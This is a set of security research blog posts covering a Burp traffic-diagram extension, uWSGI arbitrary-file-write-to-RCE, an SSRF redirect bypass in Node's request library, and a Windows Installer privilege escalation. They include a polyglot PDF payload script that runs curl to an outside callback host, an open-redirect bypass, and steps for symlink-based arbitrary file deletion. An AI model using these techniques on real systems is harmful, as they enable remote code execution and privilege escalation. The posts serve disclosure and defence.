In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for abstract visualization, with all the information carried by the diagram itself, PESD is designed to include granular information related to the underlying HTTP traffic being represented, in the form of metadata.

The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.

pesdExporter
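
To give a feel for the underlying syntax, here is a minimal hand-written MermaidJS snippet in the spirit of a PESD export (the actors and the flags are made up for illustration):

    sequenceDiagram
        autonumber
        participant Browser
        participant App as app.example.com
        Browser->>App: GET /login?redirect_uri=... [UrlParams]
        App-->>Browser: 302 Found [Location]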

Some key characteristics of the format:

  • visual analysis, especially useful for complex application flows in multi-actor scenarios, where the list-based proxy view is not suited to visualizing the abstract logic
  • tester-specific syntax to facilitate the analysis and overall readability
  • parsed metadata from the web traffic to enable further automation of the analysis
  • usable for reporting purposes, like documentation of current implementations or Proof of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.

pesdExporter

Once loaded, sending items to the extension will directly result in an export with all the active settings.

Currently, two modes of operation are supported:

  • Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis

pesdExporter
  • Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis

pesdExporter

Export Capabilities

  • Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover

  • Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to the variable names <UUID_N> / <VAR_N>. The re-rendering will reshape the diagram to improve flow readability. Every occurrence of the same value maintains the same name

  • Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports

  • Save as:

    • Sequence Diagram in SVG format
    • Markdown file (MermaidJS syntax)
    • Traffic metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

  • OAuth2 / OpenID Connect The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame

  • SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:

pesdExporter

The template engine also ensures consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames, since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS rendering.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered a warning that the application is using a non-standard implementation.

Do you want to contribute by writing your own templates? Follow the template implementation guide.

Why PESD?

During Test Planning and Auditing

PESD exports allow visualizing complex functionalities in their entirety while still providing access to the core parts of their underlying logic. The role of each actor can be easily derived and used to build a test plan before diving into Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted at a glance.

The following detailed examples are extracted from our testing activities:

  • SAML Response Double Spending. The SAML Response was sent twice, and one of the submissions happened outside of the flow frame

pesdExporter
  • OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.

pesdExporter

During Reporting

A major benefit of the research output is the ability to pair the diagrams generated with PESD with the analysis of a vulnerability. The inclusion of PoC-specific exports in reports makes it possible to describe the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and linking it in the description. The vulnerability description can be adapted to different testing approaches:

  • Black Box Testing - The description can refer to the relevant sequence numbers in the flow, along with the observed behavior and flaws;

  • White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This is particularly useful for helping the reader link the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) web application used by super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web-facing platform.

In order to restrict access to customers’ data, support access had to be granted by the tenant admin in the web-facing platform. This way, the admins of the internal application had user access only to organizations that issued a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:

pesdExporter

The handling function of the first request (1) checked for the presence of an access grant for the requested user’s tenant. If a valid grant existed, it returned the redirection URL for an internal API defined in AWS API Gateway. The API was exposed only within the internal network, accessible via VPN.

The second request (3) pointed to the AWS API Gateway. The endpoint was handled by an AWS Lambda function taking as input the URL parameters tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the obtained authentication details are submitted to web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web-facing platform. By doing so, the need for a valid super-admin account on the internal application (authentication) and for a specific target-user access grant (authorization) was bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza. The extension was developed during his internship with 50% research time.

A New Vector For “Dirty” Arbitrary File Write to RCE

27 February 2023 at 23:00

pesdExporter

Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

  • Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
  • Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
  • Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

  • Overwriting or adding files that will be processed by the application server:
    • Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
    • Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
    • Temp files
    • Secrets or environmental files (e.g., venv)
    • Serialized session files
  • Manipulating procfs to execute arbitrary code
  • Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
    • Crontab routines
    • Bash scripts
    • .bashrc, .bash-profile and .profile
    • authorized_keys and authorized_keys2 - to gain SSH access
    • Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.

An example of a “dirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint through which an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

  1. Reading an existing PDF template file and its stream
  2. Combining the PDF template and the new attacker-provided contents
  3. Saving the results in a PDF file named by the attacker

The attack was limited, since it could only impact files writable by the application user, and all of the application files were read-only. While an attacker could already use the vulnerability to delete logs or on-file databases, no higher impact was possible at first glance. Looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128. The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {
			break;
		}
		lines++;

		// skip empty line
		key = ini_lstrip(ini);
		ini_rstrip(key);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			}
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			}
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					ini_rstrip(key);
					val = ini_lstrip(val);
					ini_rstrip(val);
					add_exported_option((char *) key, val, 0);
				}
			}
		}

		len -= (ini_line - ini);
		ini += (ini_line - ini);

	}

More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    [uwsgi]
    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to reload the configuration (such as triggering a restart of the service via a second DoS bug or waiting for the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, whereby the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    [uwsgi]
    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket = 127.0.0.1:8001
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

Putting it all together

In our PDF-exporting scenario, we had to craft a polyglot, syntactically valid PDF file containing our valid multi-line .ini configuration file. The .ini payload had to survive the merging with the PDF template. We were able to embed the multi-line .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
        et.set_tags(
            ["doyensec.jpg"],
            tags={"model": "&#x0a;[uwsgi]&#x0a;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"},
            params=["-E", "-overwrite_original"]
        )

    class MyFPDF(FPDF):
        pass

    pdf = MyFPDF()

    pdf.add_page()
    pdf.image('./doyensec.jpg')
    pdf.output('payload.pdf', 'F')

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

  1. Upload payload.pdf into /app/console/uwsgi-sockets.ini
  2. Wait for server to restart or force the uWSGI reload by overwriting any .py
  3. Verify the callback made by curl on Burp collaborator

Conclusions

As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.

SSRF Cross Protocol Redirect Bypass

15 March 2023 at 23:00

Server Side Request Forgery (SSRF) is a fairly well-known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I had bypassed a filter that we had recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.

Introduction

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

Request Library Vulnerability

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.

None of the above is new, of course. All of these techniques have been around for years, and any reputable anti-SSRF library mitigates such risks. And yet, I have bypassed it.

The client’s code was a simple endpoint created for an integration. During the original engagement, there was no filtering at all. After our test, the client applied the anti-SSRF library ssrf-req-filter. For research and code anonymity purposes, I have extracted the logic into a standalone NodeJS script:

const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});

To verify the redirect bypass, I created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

Initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test" 
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200

What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

  // handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
  delete request.agent
}

According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server would cause a cross-protocol redirect. This is needed since the native NodeJs http(s).agent cannot be used with both protocols.

Unfortunately, such behavior also loses any event handling associated with the agent. Given that the SSRF prevention is based on the agent’s createConnection event handler, this unexpected behavior undermines the effectiveness of SSRF mitigation strategies in the request library.

Disclosure

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-days mark, we have decided to publish the full technical details as well as a public Github issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID has been assigned to this vulnerability.

  • 12/05/2022 - First disclosure to the maintainer
  • 01/18/2023 - Another attempt to contact the maintainer
  • 03/08/2023 - A Github issue creation, without the technical details
  • 03/13/2023 - CVE-2023-28155 assigned
  • 03/16/2023 - Full technical details disclosure

Other Libraries

Since a supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) clients, it is natural to ask how other popular libraries handle these cases.

Node-Fetch

The node-fetch library also allows overwriting the HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log(`${error.toString().split('\n')[0]}`);
});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.

Axios

The axios library’s options allow overwriting the agents for both protocols separately. Therefore, the following code is protected:

axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})

Note: In the axios library, it is necessary to hardcode the URLs during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for the wrong protocol, and the cross-protocol redirect would fail, similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
        - pattern-either:
            - pattern: |
                {..., httpsAgent:..., ...}
            - pattern: |
                {..., httpAgent:..., ...}
        - pattern-not: |
                {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING

Summary

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g., HTTPS to HTTP). While many libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.

Windows Installer EOP (CVE-2023-21800)

20 March 2023 at 23:00

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you’re only interested in the vulnerability itself, then jump right there

Introduction

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is a need for strict control over employee accounts. In particular, in a well-secured Windows environment, the rule of least privileges ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

Typical installation

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installer directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at the file properties (but it’s up to the MSI creator to decide which properties are configured), search the Windows registry, or ask WMI:

$ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name

IdentifyingNumber                      Name
-----------------                      ----
{B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.
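
As an alternative to WMI, the uninstall keys in the registry can be queried to correlate products with their GUIDs (a sketch; the set of populated properties varies per package):

$ Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*' | ? { $_.DisplayName -like "*Chrome*" } | select PSChildName,DisplayName,DisplayVersion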

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

Repair process

The builtin Windows tool, called msiexec.exe, is located in the System32 and SysWOW64 directories. It is used to manage the MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page although some additional undocumented switches are also implemented.

The flags worth highlighting are:

  • /l*vx to log any additional details and search for interesting events
  • /qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

Parameter Description
/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if a file is missing, or if an equal or older version is installed.
/fd Repairs the package if a file is missing, or if a different version is installed.
/fc Repairs the package if a file is missing, or if the checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless, of course, the system is badly misconfigured). However, the repair option is an interesting exception: not every package will work like this, but it’s not hard to find one that will. For these, msiexec will auto-elevate to perform the necessary actions as the SYSTEM user. Interestingly enough, some actions will still be performed using our unprivileged account, making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.

We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It’s possible to miss something interesting, e.g., a child process’s actions, but it’s unrealistic to dig into every single event at once. Also, I’m intentionally disabling registry activity tracking, but occasionally it’s worth reenabling this to see if certain actions aren’t controlled by editable registry keys.

Procmon filter settings

Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Procmon highlighting settings

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.
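
For example, James Forshaw’s symboliclink-testing-tools implement several such primitives usable from an unprivileged context. A hypothetical invocation pointing a user-writable location at a protected file could look like:

CreateSymlink.exe C:\Users\lowpriv\planted\target.txt C:\ProtectedDir\protected-file.txt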

Windows EoP primitives

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability, we can at least break the operating system. Often, though, we can also turn it into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. Nevertheless, even a single EoP primitive should be treated as a serious security issue.

One vulnerability to rule them all (CVE-2023-21800)

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-zip

7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

Filename        Version
7z2201-x64.msi  22.01

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

     <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
        <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
      </Directory>
      ...
     <Component Id="Help" Guid="$(var.CompHelp)">
        <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
            <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
        </File>
     </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets the ProgramMenuFolder property to the full path of the Program Menu folder for the current user. If an “All Users” profile exists and the ALLUSERS property is set, then this property is set to the folder in the “All Users” profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA% as in the previous example), or to the directory associated with the “All Users” profile.

While the first configuration does not require additional explanation, the second one is tricky. The “All Users” profile typically resolves to the C:\ProgramData\Microsoft\Windows\Start Menu\Programs path. Although C:\ProgramData is writable even by unprivileged users, the C:\ProgramData\Microsoft subdirectory is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the “All Users” profile to an arbitrary location writable by the user. The setx command can be used for that. It modifies variables associated with the current user, but it’s important to emphasize that only future sessions are affected: a completely new cmd.exe instance must be started to inherit the new settings.
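For example, assuming the attacker stages a writable directory at C:\FakeProgramData (the same path used in the capture later in this post), the poisoning could look like this:

setx PROGRAMDATA C:\FakeProgramData

The repair must then be launched from a freshly spawned cmd.exe, since only new processes inherit the poisoned variable.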

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:

  • Remove the arbitrary file (using the SYSTEM privileges)
  • Attempt to restore the original file (using an unprivileged user account)

The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed on the following capture, assuming we’re targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.

The operations resulting in REPARSE

Firstly, we can see the actions resulting in the REPARSE status. The file (or rather its attributes) is briefly processed, and SetRenameInformationFile is called on it. The rename part is slightly misleading: what is actually happening is that the file is moved to a different location. This is how the Windows Installer creates rollback instructions in case something goes wrong. As stated before, SetRenameInformationFile doesn’t work on the file handle level and cannot be impersonated. This action runs with full SYSTEM privileges.

Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The operations resulting in ACCESS DENIED

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY’s maintainer on a possible workaround, which was introduced in version 0.78. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn’t functionally equivalent and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

Redirection Guard

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned the identifier CVE-2023-21800 to it.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible, as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has since been enabled with the 2023-02-14 update.

In October 2022, Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of process mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification checks whether the filesystem junction was created by a non-admin user and, if so, whether the policy prevents following it. If the operation is blocked, the error 0xC00004BC is returned. Junctions created by admin users are explicitly allowed, as they carry a higher trust-level label.

Initially, Redirection Guard was enabled for the print service. The 2023-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The 0xC00004BC error returned by the new mitigation

The msiexec is one of a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>
#include <TlHelp32.h>
#include <cstdio>
#include <string>
#include <vector>
#include <memory>

